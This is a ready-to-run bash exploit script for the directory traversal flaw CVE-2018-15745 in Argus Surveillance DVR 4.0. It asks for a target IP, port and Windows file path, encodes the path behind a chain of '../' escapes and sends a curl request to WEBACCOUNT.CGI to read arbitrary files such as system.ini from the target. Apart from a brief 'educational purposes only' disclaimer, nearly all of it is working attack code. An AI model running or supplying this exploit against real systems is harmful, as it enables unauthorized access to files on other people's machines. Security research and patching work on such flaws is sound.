#!/usr/bin/bash

#Argus Surveillance DVR 4.0.0.0 - Directory Traversal Exploit
#Exploit Taken from here: https://www.exploit-db.com/exploits/45296 
#Works for DVR 4.0 on Windows OS

#CVE:2018-15745 

### Disclaimer

#This project is intended for **educational and research purposes only**.  
#Use of this code for attacking targets without prior mutual consent is **illegal**.  
#The author(s) assume **no responsibility** for any misuse or damage caused by this code.  
#You are solely responsible for your actions.

#Always get proper authorization before conducting any security testing.

#Usage: chmod +x exploit.sh
#       ./exploit.sh

echo -e "
▄▖          ▄▖        ▘▜ ▜           ▄ ▖▖▄▖▖▖
▌▌▛▘▛▌▌▌▛▘  ▚ ▌▌▛▘▌▌█▌▌▐ ▐ ▀▌▛▌▛▘█▌  ▌▌▌▌▙▘▙▌
▛▌▌ ▙▌▙▌▄▌  ▄▌▙▌▌ ▚▘▙▖▌▐▖▐▖█▌▌▌▙▖▙▖  ▙▘▚▘▌▌ ▌
    ▄▌                                       
"

echo "Enter Target-Host IP Address"

read IP

echo "Enter Target-Host Port: "

read PORT

echo "Enter the Directory (e.g. C:\Windows\system.ini): "

read -r DIRECTORY

while [[ ! -z "${DIRECTORY}" ]]; do
#Cutting the first 3 characters from the DIRECTORY string
DIRECTORY="${DIRECTORY:3}"

#Transforming \ character to / character
DIRECTORY="${DIRECTORY//\\//}"

#Took from Google Generative AI
ENCODED_DIRECTORY=""
for (( i = 0; i < ${#DIRECTORY}; i++ )); do
  char="${DIRECTORY:$i:1}"
  case "$char" in
    [a-zA-Z0-9._-]) encoded_char="$char" ;;
    " ") encoded_char="%20" ;;
    "!") encoded_char="%21" ;;
    '"') encoded_char="%22" ;;
    "#") encoded_char="%23" ;;
    "$") encoded_char="%24" ;;
    "%") encoded_char="%25" ;;
    "&") encoded_char="%26" ;;
    "'") encoded_char="%27" ;;
    "(") encoded_char="%28" ;;
    ")") encoded_char="%29" ;;
    "*") encoded_char="%2A" ;;
    "+") encoded_char="%2B" ;;
    ",") encoded_char="%2C" ;;
    "-") encoded_char="%2D" ;;
    ".") encoded_char="%2E" ;;
    "/") encoded_char="%2F" ;;
    ":") encoded_char="%3A" ;;
    ";") encoded_char="%3B" ;;
    "<") encoded_char="%3C" ;;
    "=") encoded_char="%3D" ;;
    ">") encoded_char="%3E" ;;
    "?") encoded_char="%3F" ;;
    "@") encoded_char="%40" ;;
    "[") encoded_char="%5B" ;;
    "\\") encoded_char="%5C" ;;
    "]") encoded_char="%5D" ;;
    "^") encoded_char="%5E" ;;
    "_") encoded_char="%5F" ;;
    "\`") encoded_char="%60" ;;
    "{") encoded_char="%7B" ;;
    "|") encoded_char="%7C" ;;
    "}") encoded_char="%7D" ;;
    "~") encoded_char="%7E" ;;
    *)
      printf -v encoded_char '%%%02X' "'$char"
  esac
  ENCODED_DIRECTORY+="$encoded_char"
done

#Going to C:\ Directory by moving to uppers folders
ESCAPE="..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F"

#Combining the ESCAPE string with the ENCODED_DIRECTORY string
ENCODED_DIRECTORY="${ESCAPE}${ENCODED_DIRECTORY}"

#Sending GET request
curl 'http://'"${IP}"':'"${PORT}"'/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE='"${ENCODED_DIRECTORY}"'&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD='

echo ""

echo "Enter the Directory (e.g. C:\Windows\system.ini): "

read -r DIRECTORY

done